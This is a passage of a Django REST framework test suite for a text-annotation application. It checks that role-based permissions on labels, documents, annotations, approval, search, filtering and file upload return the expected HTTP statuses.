label = {'text': 'Percentage', 'prefix_key': 'ctrl', 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_cannot_create_same_shortcut_key(self):
self.client.login(username=self.admin_user_name,
password=self.admin_user_pass)
label = {'text': 'Person', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
label = {'text': 'Percentage', 'prefix_key': None, 'suffix_key': 'p'}
response = self.client.post(self.url, format='json', data=label)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_disallows_project_member_to_create_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
User.objects.create_user(username=cls.non_project_member_name, password=cls.non_project_member_pass)
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
project = mommy.make('Project', users=[project_member, super_user])
cls.label = mommy.make('Label', project=project)
cls.label_with_shortcut = mommy.make('Label', suffix_key='l', project=project)
cls.url = reverse(viewname='label_detail', args=[project.id, cls.label.id])
cls.url_with_shortcut = reverse(viewname='label_detail', args=[project.id, cls.label_with_shortcut.id])
cls.data = {'text': 'example'}
create_default_roles()
assign_user_to_role(project_member=project_member, project=project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_label_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.label.id)
def test_do_not_return_label_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_update_label(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['text'], self.data['text'])
def test_allows_superuser_to_update_label_with_shortcut(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.patch(self.url_with_shortcut, format='json', data={'suffix_key': 's'})
self.assertEqual(response.data['suffix_key'], 's')
def test_disallows_project_member_to_update_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_label(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestLabelUploadAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
User.objects.create_user(username=cls.non_project_member_name, password=cls.non_project_member_pass)
project_admin = User.objects.create_user(username=cls.super_user_name,
password=cls.super_user_pass)
project = mommy.make('Project', users=[project_member, project_admin])
cls.url = reverse(viewname='label_upload', args=[project.id])
create_default_roles()
assign_user_to_role(project_member=project_admin, project=project, role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=project_member, project=project, role_name=settings.ROLE_ANNOTATOR)
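# Posts a fixture file from DATA_DIR to the label_upload endpoint and checks the response status.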
def help_to_upload_file(self, filename, expected_status):
with open(os.path.join(DATA_DIR, filename), 'rb') as f:
response = self.client.post(self.url, data={'file': f})
self.assertEqual(response.status_code, expected_status)
def test_allows_project_admin_to_upload_label(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
self.help_to_upload_file('valid_labels.json', status.HTTP_201_CREATED)
def test_disallows_project_member_to_upload_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
self.help_to_upload_file('valid_labels.json', status.HTTP_403_FORBIDDEN)
def test_try_to_upload_invalid_file(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
self.help_to_upload_file('invalid_labels.json', status.HTTP_400_BAD_REQUEST)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestDocumentListAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
cls.main_project = mommy.make('TextClassificationProject', users=[project_member, super_user])
doc1 = mommy.make('Document', project=cls.main_project)
doc2 = mommy.make('Document', project=cls.main_project)
mommy.make('Document', project=cls.main_project)
cls.random_order_project = mommy.make('TextClassificationProject', users=[project_member, super_user],
randomize_document_order=True)
mommy.make('Document', 100, project=cls.random_order_project)
sub_project = mommy.make('TextClassificationProject', users=[non_project_member])
mommy.make('Document', project=sub_project)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.random_order_project_url = reverse(viewname='doc_list', args=[cls.random_order_project.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_member, project=cls.random_order_project,
role_name=settings.ROLE_ANNOTATOR)
mommy.make('DocumentAnnotation', document=doc1, user=project_member)
mommy.make('DocumentAnnotation', document=doc2, user=project_member)
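# Logs in as the given user, requests the document list URL and asserts the expected number of results.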
def _test_list(self, url, username, password, expected_num_results):
self.client.login(username=username, password=password)
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.json().get('results')), expected_num_results)
def test_returns_docs_to_project_member(self):
self._test_list(self.url,
username=self.project_member_name,
password=self.project_member_pass,
expected_num_results=3)
def test_returns_docs_to_project_member_filtered_to_active(self):
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.project_member_name,
password=self.project_member_pass,
expected_num_results=1)
def test_returns_docs_to_project_member_filtered_to_completed(self):
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.project_member_name,
password=self.project_member_pass,
expected_num_results=2)
def test_returns_docs_to_project_member_filtered_to_active_with_collaborative_annotation(self):
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.super_user_name,
password=self.super_user_pass,
expected_num_results=3)
self._patch_project(self.main_project, 'collaborative_annotation', True)
self._test_list('{}?doc_annotations__isnull=true'.format(self.url),
username=self.super_user_name,
password=self.super_user_pass,
expected_num_results=1)
def test_returns_docs_to_project_member_filtered_to_completed_with_collaborative_annotation(self):
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.super_user_name,
password=self.super_user_pass,
expected_num_results=0)
self._patch_project(self.main_project, 'collaborative_annotation', True)
self._test_list('{}?doc_annotations__isnull=false'.format(self.url),
username=self.super_user_name,
password=self.super_user_pass,
expected_num_results=2)
def test_returns_docs_in_consistent_order_for_all_users(self):
self.client.login(username=self.project_member_name, password=self.project_member_pass)
user1_documents = self.client.get(self.url, format='json').json().get('results')
self.client.logout()
self.client.login(username=self.super_user_name, password=self.super_user_pass)
user2_documents = self.client.get(self.url, format='json').json().get('results')
self.client.logout()
self.assertEqual([doc['id'] for doc in user1_documents], [doc['id'] for doc in user2_documents])
def test_can_return_docs_in_consistent_random_order(self):
self.client.login(username=self.project_member_name, password=self.project_member_pass)
user1_documents1 = self.client.get(self.random_order_project_url, format='json').json().get('results')
user1_documents2 = self.client.get(self.random_order_project_url, format='json').json().get('results')
self.client.logout()
self.assertEqual(user1_documents1, user1_documents2)
self.client.login(username=self.super_user_name, password=self.super_user_pass)
user2_documents1 = self.client.get(self.random_order_project_url, format='json').json().get('results')
user2_documents2 = self.client.get(self.random_order_project_url, format='json').json().get('results')
self.client.logout()
self.assertEqual(user2_documents1, user2_documents2)
self.assertNotEqual(user1_documents1, user2_documents1)
self.assertNotEqual(user1_documents2, user2_documents2)
def test_do_not_return_docs_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_docs_of_other_projects(self):
self._test_list(self.url,
username=self.project_member_name,
password=self.project_member_pass,
expected_num_results=self.main_project.documents.count())
def test_allows_superuser_to_create_doc(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_disallows_project_member_to_create_doc(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestDocumentDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
project = mommy.make('TextClassificationProject', users=[project_member, super_user])
cls.doc = mommy.make('Document', project=project)
cls.url = reverse(viewname='doc_detail', args=[project.id, cls.doc.id])
cls.data = {'text': 'example'}
assign_user_to_role(project_member=project_member, project=project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_doc_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.data['id'], self.doc.id)
def test_do_not_return_doc_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_update_doc(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.data['text'], self.data['text'])
def test_disallows_project_member_to_update_doc(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.url, format='json', data=self.data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_doc(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_doc(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestApproveLabelsAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.annotator_name = 'annotator_name'
cls.annotator_pass = '<PASSWORD>'
cls.approver_name = 'approver_name_name'
cls.approver_pass = '<PASSWORD>'
cls.project_admin_name = 'project_admin_name'
cls.project_admin_pass = '<PASSWORD>'
annotator = User.objects.create_user(username=cls.annotator_name,
password=cls.annotator_pass)
approver = User.objects.create_user(username=cls.approver_name,
password=cls.approver_pass)
project_admin = User.objects.create_user(username=cls.project_admin_name,
password=cls.project_admin_pass)
project = mommy.make('TextClassificationProject', users=[annotator, approver, project_admin])
cls.doc = mommy.make('Document', project=project)
cls.url = reverse(viewname='approve_labels', args=[project.id, cls.doc.id])
create_default_roles()
assign_user_to_role(project_member=annotator, project=project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=approver, project=project,
role_name=settings.ROLE_ANNOTATION_APPROVER)
assign_user_to_role(project_member=project_admin, project=project,
role_name=settings.ROLE_PROJECT_ADMIN)
def test_allow_project_admin_to_approve_and_disapprove_labels(self):
self.client.login(username=self.project_admin_name, password=self.project_admin_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.data['annotation_approver'], self.project_admin_name)
response = self.client.post(self.url, format='json', data={'approved': False})
self.assertIsNone(response.data['annotation_approver'])
def test_allow_approver_to_approve_and_disapprove_labels(self):
self.client.login(username=self.approver_name, password=self.approver_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.data['annotation_approver'], self.approver_name)
response = self.client.post(self.url, format='json', data={'approved': False})
self.assertIsNone(response.data['annotation_approver'])
def test_disallows_non_annotation_approver_to_approve_and_disapprove_labels(self):
self.client.login(username=self.annotator_name, password=self.annotator_pass)
response = self.client.post(self.url, format='json', data={'approved': True})
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestAnnotationListAPI(APITestCase, TestUtilsMixin):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.another_project_member_name = 'another_project_member_name'
cls.another_project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
another_project_member = User.objects.create_user(username=cls.another_project_member_name,
password=cls.another_project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
main_project = mommy.make('SequenceLabelingProject', users=[project_member, another_project_member])
main_project_label = mommy.make('Label', project=main_project)
main_project_doc = mommy.make('Document', project=main_project)
mommy.make('SequenceAnnotation', document=main_project_doc, user=project_member)
mommy.make('SequenceAnnotation', document=main_project_doc, user=another_project_member)
sub_project = mommy.make('SequenceLabelingProject', users=[non_project_member])
sub_project_doc = mommy.make('Document', project=sub_project)
mommy.make('SequenceAnnotation', document=sub_project_doc)
cls.classification_project = mommy.make('TextClassificationProject',
users=[project_member, another_project_member])
cls.classification_project_label_1 = mommy.make('Label', project=cls.classification_project)
cls.classification_project_label_2 = mommy.make('Label', project=cls.classification_project)
cls.classification_project_document = mommy.make('Document', project=cls.classification_project)
cls.classification_project_url = reverse(
viewname='annotation_list', args=[cls.classification_project.id, cls.classification_project_document.id])
assign_user_to_role(project_member=project_member, project=cls.classification_project,
role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=another_project_member, project=cls.classification_project,
role_name=settings.ROLE_ANNOTATOR)
cls.url = reverse(viewname='annotation_list', args=[main_project.id, main_project_doc.id])
cls.post_data = {'start_offset': 0, 'end_offset': 1, 'label': main_project_label.id}
cls.num_entity_of_project_member = SequenceAnnotation.objects.filter(document=main_project_doc,
user=project_member).count()
cls.num_entity_of_another_project_member = SequenceAnnotation.objects.filter(
document=main_project_doc,
user=another_project_member).count()
cls.main_project = main_project
assign_user_to_role(project_member=project_member, project=main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_returns_annotations_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_annotations_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_annotations_of_another_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(len(response.data), self.num_entity_of_project_member)
def test_returns_annotations_of_another_project_member_if_collaborative_project(self):
self._patch_project(self.main_project, 'collaborative_annotation', True)
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(len(response.data),
self.num_entity_of_project_member + self.num_entity_of_another_project_member)
def test_allows_project_member_to_create_annotation(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.post(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_disallows_non_project_member_to_create_annotation(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.post(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_second_annotation_for_single_class_project(self):
self._patch_project(self.classification_project, 'single_class_classification', True)
self.client.login(username=self.project_member_name, password=self.project_member_pass)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_1.id})
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_2.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_disallows_second_annotation_for_single_class_shared_project(self):
self._patch_project(self.classification_project, 'single_class_classification', True)
self._patch_project(self.classification_project, 'collaborative_annotation', True)
self.client.login(username=self.project_member_name, password=self.project_member_pass)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_1.id})
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.client.login(username=self.another_project_member_name, password=self.another_project_member_pass)
response = self.client.post(self.classification_project_url, format='json',
data={'label': self.classification_project_label_2.id})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
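# Local copy of TestUtilsMixin._patch_project: patch a project attribute and restore it on cleanup.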
def _patch_project(self, project, attribute, value):
old_value = getattr(project, attribute, None)
setattr(project, attribute, value)
project.save()
def cleanup_project():
setattr(project, attribute, old_value)
project.save()
self.addCleanup(cleanup_project)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestAnnotationDetailAPI(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>'
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.another_project_member_name = 'another_project_member_name'
cls.another_project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
# Todo: change super_user to project_admin.
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
another_project_member = User.objects.create_user(username=cls.another_project_member_name,
password=cls.another_project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
main_project = mommy.make('SequenceLabelingProject',
users=[super_user, project_member, another_project_member])
main_project_doc = mommy.make('Document', project=main_project)
main_project_entity = mommy.make('SequenceAnnotation',
document=main_project_doc, user=project_member)
another_entity = mommy.make('SequenceAnnotation',
document=main_project_doc, user=another_project_member)
shared_project = mommy.make('SequenceLabelingProject',
collaborative_annotation=True,
users=[project_member, another_project_member])
shared_project_doc = mommy.make('Document', project=shared_project)
shared_entity = mommy.make('SequenceAnnotation', document=shared_project_doc, user=another_project_member)
cls.url = reverse(viewname='annotation_detail', args=[main_project.id,
main_project_doc.id,
main_project_entity.id])
cls.another_url = reverse(viewname='annotation_detail', args=[main_project.id,
main_project_doc.id,
another_entity.id])
cls.shared_url = reverse(viewname='annotation_detail', args=[shared_project.id,
shared_project_doc.id,
shared_entity.id])
cls.post_data = {'start_offset': 0, 'end_offset': 10}
assign_user_to_role(project_member=project_member, project=main_project, role_name=settings.ROLE_ANNOTATOR)
assign_user_to_role(project_member=project_member, project=shared_project, role_name=settings.ROLE_ANNOTATOR)
def test_returns_annotation_to_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_do_not_return_annotation_to_non_project_member(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.get(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_do_not_return_annotation_by_another_project_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.another_url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_project_member_to_update_annotation(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_disallows_non_project_member_to_update_annotation(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.patch(self.url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_project_member_to_update_annotation_of_another_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allows_superuser_to_delete_annotation_of_another_member(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
response = self.client.delete(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_allows_project_member_to_delete_annotation(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_disallows_project_member_to_delete_annotation(self):
self.client.login(username=self.non_project_member_name,
password=self.non_project_member_pass)
response = self.client.delete(self.url, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_disallows_project_member_to_delete_annotation_of_another_member(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.another_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_allow_member_to_update_others_annotation_in_shared_project(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.patch(self.shared_url, format='json', data=self.post_data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_allow_member_to_delete_others_annotation_in_shared_project(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.delete(self.shared_url, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestSearch(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
cls.non_project_member_name = 'non_project_member_name'
cls.non_project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
non_project_member = User.objects.create_user(username=cls.non_project_member_name,
password=cls.non_project_member_pass)
cls.main_project = mommy.make('TextClassificationProject', users=[project_member])
cls.search_term = 'example'
doc1 = mommy.make('Document', text=cls.search_term, project=cls.main_project)
doc2 = mommy.make('Document', text='Lorem', project=cls.main_project)
label1 = mommy.make('Label', project=cls.main_project)
label2 = mommy.make('Label', project=cls.main_project)
mommy.make('SequenceAnnotation', document=doc1, user=project_member, label=label1)
mommy.make('SequenceAnnotation', document=doc2, user=project_member, label=label2)
sub_project = mommy.make('TextClassificationProject', users=[non_project_member])
mommy.make('Document', text=cls.search_term, project=sub_project)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.data = {'q': cls.search_term}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_can_filter_doc_by_term(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=self.data)
count = Document.objects.filter(text__contains=self.search_term,
project=self.main_project).count()
self.assertEqual(response.data['count'], count)
def test_can_order_doc_by_created_at_ascending(self):
params = {'ordering': 'created_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('created_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_created_at_descending(self):
params = {'ordering': '-created_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('-created_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_annotation_updated_at_ascending(self):
params = {'ordering': 'seq_annotations__updated_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('seq_annotations__updated_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_order_doc_by_annotation_updated_at_descending(self):
params = {'ordering': '-seq_annotations__updated_at'}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project).order_by('-seq_annotations__updated_at').values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestFilter(APITestCase):
@classmethod
def setUpTestData(cls):
cls.project_member_name = 'project_member_name'
cls.project_member_pass = '<PASSWORD>'
create_default_roles()
project_member = User.objects.create_user(username=cls.project_member_name,
password=cls.project_member_pass)
cls.main_project = mommy.make('SequenceLabelingProject', users=[project_member])
cls.label1 = mommy.make('Label', project=cls.main_project)
cls.label2 = mommy.make('Label', project=cls.main_project)
doc1 = mommy.make('Document', project=cls.main_project)
doc2 = mommy.make('Document', project=cls.main_project)
mommy.make('Document', project=cls.main_project)
mommy.make('SequenceAnnotation', document=doc1, user=project_member, label=cls.label1)
mommy.make('SequenceAnnotation', document=doc2, user=project_member, label=cls.label2)
cls.url = reverse(viewname='doc_list', args=[cls.main_project.id])
cls.params = {'seq_annotations__label__id': cls.label1.id}
assign_user_to_role(project_member=project_member, project=cls.main_project,
role_name=settings.ROLE_ANNOTATOR)
def test_can_filter_by_label(self):
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=self.params)
docs = Document.objects.filter(project=self.main_project,
seq_annotations__label__id=self.label1.id).values()
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_filter_doc_with_annotation(self):
params = {'seq_annotations__isnull': False}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project, seq_annotations__isnull=False).values()
self.assertEqual(response.data['count'], docs.count())
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
def test_can_filter_doc_without_anotation(self):
params = {'seq_annotations__isnull': True}
self.client.login(username=self.project_member_name,
password=self.project_member_pass)
response = self.client.get(self.url, format='json', data=params)
docs = Document.objects.filter(project=self.main_project, seq_annotations__isnull=True).values()
self.assertEqual(response.data['count'], docs.count())
for d1, d2 in zip(response.data['results'], docs):
self.assertEqual(d1['id'], d2['id'])
@classmethod
def doCleanups(cls):
remove_all_role_mappings()
class TestUploader(APITestCase):
@classmethod
def setUpTestData(cls):
cls.super_user_name = 'super_user_name'
cls.super_user_pass = '<PASSWORD>user_<PASSWORD>'
# Todo: change super_user to project_admin.
create_default_roles()
super_user = User.objects.create_superuser(username=cls.super_user_name,
password=cls.super_user_pass,
email='<EMAIL>')
cls.classification_project = mommy.make('TextClassificationProject',
users=[super_user], project_type=DOCUMENT_CLASSIFICATION)
cls.labeling_project = mommy.make('SequenceLabelingProject',
users=[super_user], project_type=SEQUENCE_LABELING)
cls.seq2seq_project = mommy.make('Seq2seqProject', users=[super_user], project_type=SEQ2SEQ)
assign_user_to_role(project_member=super_user, project=cls.classification_project,
role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=super_user, project=cls.labeling_project,
role_name=settings.ROLE_PROJECT_ADMIN)
assign_user_to_role(project_member=super_user, project=cls.seq2seq_project,
role_name=settings.ROLE_PROJECT_ADMIN)
def setUp(self):
self.client.login(username=self.super_user_name,
password=self.super_user_pass)
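# upload_test_helper posts a fixture file from DATA_DIR to the doc_uploader endpoint in the given
# format; label_test_helper then verifies the labels that the upload created as a side effect.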
def upload_test_helper(self, project_id, filename, file_format, expected_status, **kwargs):
url = reverse(viewname='doc_uploader', args=[project_id])
with open(os.path.join(DATA_DIR, filename), 'rb') as f:
response = self.client.post(url, data={'file': f, 'format': file_format})
self.assertEqual(response.status_code, expected_status)
def label_test_helper(self, project_id, expected_labels, expected_label_keys):
url = reverse(viewname='label_list', args=[project_id])
